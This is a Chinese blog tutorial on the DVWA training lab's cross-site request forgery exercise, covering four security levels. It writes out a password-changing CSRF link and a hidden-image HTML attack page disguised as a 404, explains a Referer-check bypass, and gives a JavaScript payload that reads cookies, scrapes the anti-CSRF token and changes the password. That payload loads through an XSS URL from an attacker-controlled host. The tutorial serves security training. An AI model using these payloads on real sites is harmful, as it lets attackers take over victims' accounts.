DVWA通过教程之跨站请求伪造CSRF

最新推荐文章于 2023-05-12 17:03:16 发布
最新推荐文章于 2023-05-12 17:03:16 发布
阅读量333 收藏 1
点赞数
分类专栏: Web安全之客户端攻击类
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39934520/article/details/108623042
版权

CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。
更多原理请参考:浅谈“跨站请求伪造(CSRF)”-干货满满

测试CSRF,要求能够不通过该页面即可修改用户登录密码。

Low

服务器端核心代码

分析:

可以看到,服务器收到修改密码的请求后,会检查参数password_new与password_conf是否相同,如果相同,就会修改密码,并没有任何的防CSRF机制(当然服务器对请求的发送者是做了身份验证的,是检查的cookie,只是这里的代码没有体现。

漏洞利用

1、构造链接

A) 最基础的:

http://192.168.33.1/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#

当受害者点击了这个链接,他的密码就会被改成password

上面过于明显,所以我们可以:

构造攻击页面

现实攻击场景下,这种方法需要事先在公网上传一个攻击页面,诱骗受害者去访问,真正能够在受害者不知情的情况下完成CSRF攻击。这里为了方便演示,就在本地写一个test.html,下面是具体代码。

<html>
	<body>
		<img src="http://192.168.33.1/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#" border="0" style="display:none;"/>

<h1>404<h1>

<h2>file not found.<h2>
	</body>
</html>

当受害者访问test.html时,会误认为是自己点击的是一个失效的url,但实际上已经遭受了CSRF攻击,密码已经被修改为了hack

Medium

服务器端核心代码

分析:

相关函数说明

PHP stripos() 函数

stripos() 函数查找字符串在另一字符串中第一次出现的位置(不区分大小写)。

注释:stripos() 函数是不区分大小写的。

注释:该函数是二进制安全的。

可以看到,Medium级别的代码检查了保留变量 HTTP_REFERER(http包头的Referer参数的值,表示来源地址)中是否包含SERVER_NAME(http包头的Host参数,及要访问的主机名,这里是192.168.33.1),希望通过这种机制抵御CSRF攻击。

漏洞利用

过滤规则是http包头的Referer参数的值中必须包含主机名(这里是192.168.33.1)

我们可以将攻击页面命名为192.168.33.1.html(页面被放置在攻击者的服务器里,服务器ip:192.168.33.3)就可以绕过了,简单来说我们可以自己添加Referer字段,然后值只要设置成包含了主机头192.168.33.1就行了,这样就满足了条件。.

Referer参数完美绕过过滤规则

High

服务器端核心代码

分析:

可以看到,High级别的代码加入了Anti-CSRF token机制,用户每次访问改密页面时,服务器会返回一个随机的token,向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token,只有token正确,才会处理客户端的请求。

漏洞利用:

构造更改密码的攻击js,引诱受害者访问,从而更改

利用xss和csrf结合,js代码内容如下,更改密码为liu

    alert(document.cookie);
    var theUrl = 'http://192.168.33.1/DVWA/vulnerabilities/csrf/';
        if(window.XMLHttpRequest) {
            xmlhttp = new XMLHttpRequest();
        }else{
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
    var count = 0;
        xmlhttp.withCredentials = true;
        xmlhttp.onreadystatechange=function(){
            if(xmlhttp.readyState ==4 && xmlhttp.status==200)
            {
                var text = xmlhttp.responseText;
                var regex = /user_token\' value\=\'(.*?)\' \/\>/;
                var match = text.match(regex);
                console.log(match);
                alert(match[1]);
                    var token = match[1];
                        var new_url = 'http://192.168.33.1/DVWA/vulnerabilities/csrf/?user_token='+token+'&password_new=liu&password_conf=liu&Change=Change';
                        if(count==0){
                            count++;
                            xmlhttp.open("GET",new_url,false);
                            xmlhttp.send();
                        }
     
     
            }
        };
        xmlhttp.open("GET",theUrl,false);
        xmlhttp.send();

js放在攻击者的服务器中,受害者访问链接 192.168.33.1为靶机的IP地址,192.168.33.3为攻击者的IP地址

http://192.168.33.1/DVWA/vulnerabilities/xss_d/?default=English #<script src="http://192.168.33.3/xss.js"></script>

页面跳转到XSS页面,

获得服务器的cookie

获得的cookie

  

  弹出后,密码更改成功,退出登录用更改的密码登录,成功

Impossible

服务端核心源代码:

分析:

可以看到,Impossible级别的代码利用PDO技术防御SQL注入,至于防护CSRF,则要求用户输入原始密码(简单粗暴),攻击者在不知道原始密码的情况下,无论如何都无法进行CSRF攻击。

红烧兔纸
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻击(XSS+CSRF).docx
01-05
请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。...
CSRF漏洞原理与防御方式
dreamthe的博客
09-17 1964
CSRF漏洞原理 CSRF被叫做请求伪造,该怎么理解这句话呢,比如 用户a在浏览器登录了账号,当他发送登录请求时候,服务器验证了账号密码,会返回给一个身份信息存放在cookie里面,浏览器保存,那么以后用户访问服务器带着这个cookie就行了。那么怎么产生攻击的呢,是用户在已经登录的状态下,访问了一个恶意的网,带浏览器保存的cookie值向服务器发送了恶意请求,服务器会以为是用户的请求,其实这是用户不知情的请求。垮了两个,一个是用户登录实际网,一个屙屎攻击者恶意构造网,所以称作请求伪造
DVWA-CSRF(请求伪造)
qq_45751902的博客
04-25 2132
目录CSRF(请求伪造)简介安全级别:Low安全级别:Medium安全级别:High安全级别:Impossible CSRF(请求伪造)简介 概念 CSRF(Cross—site request forgery),请求伪造,是指利用受害者未失效的身份认证信息(cookie,会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账,改密等)。 CSRF与XSS的区别 CSRF属于业务逻辑漏洞
dvwa CSRF请求伪造
yuysjx的博客
02-08 99
csrf
DVWA(3)请求伪造(CSRF) LOW-HIGHT 操作记录
lllllaaa111的博客
11-08 766
今天带来第三期请求伪造漏洞操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。
DVWA通关攻略之请求伪造
勿山几已
05-12 401
介绍CSRF攻击并简单演示攻击过程。
pikachu,dvwacsrf详细步骤
05-17
初学者可以参考
DVWA全级别教程
10-26
DVWA全级别教程 通关秘籍 练手的同学可以下载 epub文件 适合手机平板看
win10 DVWA下载安装配置图文教程详解(新手学渗透)
01-11
电脑重装系统了,需要重新装一下渗透测试的学习环境DVWA,借此机会就跟大家讲一下DVWA的安装过程,因为不同的电脑配置、环境不同,在我的电脑上按照我这个安装教程是一次性就安装好了的。如果安装的时候遇到了什么...
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
DVWA请求伪造CSRF攻击全面分析
abraham76的博客
10-01 3247
1、CSRF简介    CSRF全称是Cross Site Request Forgery,请求伪造。简单理解就是利用客户身份伪造请求,以达到指定目的。    具体场景就是:假设A登陆了某游戏网Game,那么Game网就会返回一个cookie来记录用户身份,以后每次请求都会自动携带该cookie与Game服务器交互。然后攻击者B精心构造了一个链接或者网页,诱使用户点击,这时就会向Game服务器发送一个请求,而该请求是携带了cookie值的,服务器就会处理该请求。B的目的就达到了。    CSRF攻击
DVWA靶场之CSRF(请求伪造)
m0_65712192的博客
11-12 938
DVWA靶场之CSRF(请求伪造)
今天i9377学了啥?
qq_47090066的博客
04-21 2600
实训背景知识 DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是: 1.Brute Force(密码破解) 2.Command Injection(命令行注入) 3.CSRF请求伪造) 4.File Inclusion(文件包含) 5.Fil
DVWA练习——CSRF请求伪造
haoaaao的博客
01-27 466
一、难度:low (1)随便点击一下change,网页上面已经显示出了修改信息的url值。 (2)直接修改即可: 回车,信息已经修改: 新密码测试成功: (1)点击html打开,然后验证,发现失败 将html文件放在vul同级目录然后打开,验证失败: 抓包可以看到这里的链接是close 将html文件改为ip.html 验证成功 (2) 失败原因: /*** CSRF ————(二)绕过http_referer来源核对_Benjiamin.
DVWA---请求伪造CSRF
wyzhxhn的博客
11-23 867
CSRF
DVWACSRF(请求伪造攻击)
热门推荐
谢公子的博客
10-01 1万+
目录 Low Middle High Impossible Low 源代码: &lt;?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; ...
DVWA请求伪造CSRF
弱弱的小雨鸟
01-21 1348
CSRF(Cross Site RequestForgery),请求伪造,是利用受害者尚未失效的身份验证信息,诱导其访问其他包含非法、恶意代码的页面,在受害者不知情的情况下向服务器发送请求,完成改密、转账等行为。请求伪造是一种十分危险的Web安全攻击,利用的是网对用户浏览器的信任,通常攻击者会通过电子邮件、聊天工具或者论坛来发送链接。如果使用不可见的img标签(宽高为0或者display
DVWA的使用2–CSRF请求伪造
StoriesWine
03-27 1657
DVWA的使用2–CSRF请求伪造CSRF(Cross-site request forgery)请求伪造,迫使用户在通过验证后在web应用中执行不必要的操作,通过伪装来自受信任用户的请求来利用受信任的网。 1).low级别 源码: 通过对源代码进行分析,我们可以看到源代码中只对两次输入的密码是否相同进行了判断,其他操作都没有进行防御,所以我们只需要用户在cookie...
CSRF 漏洞原理详解及防御方法
weixin_30248399的博客
08-09 2425
请求伪造:攻击者可以劫持其他用户进行的一些请求,利用用户身份进行恶意操作。 例如:请求http://x.com/del.php?id=1 是一个删除ID为1的账号,但是只有管理员才可以操作,如果攻击者把这个页面嵌套到其他网中<img src= “http://x.com/del.php?id=1”> 再把这个页面发送给管理员,只要管理员打开这个页面,同时浏览器也会利用当前登陆...
dvwa请求伪造 (csrf)
最新发布
09-13
请求伪造CSRF)是一种攻击方式,利用用户已经通过身份验证的会话执行非预期的操作。 在DVWA中,CSRF可以被用作一种漏洞进行攻击。攻击者可以通过在受害者浏览器中注入恶意代码或链接,来诱使用户执行某些不...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值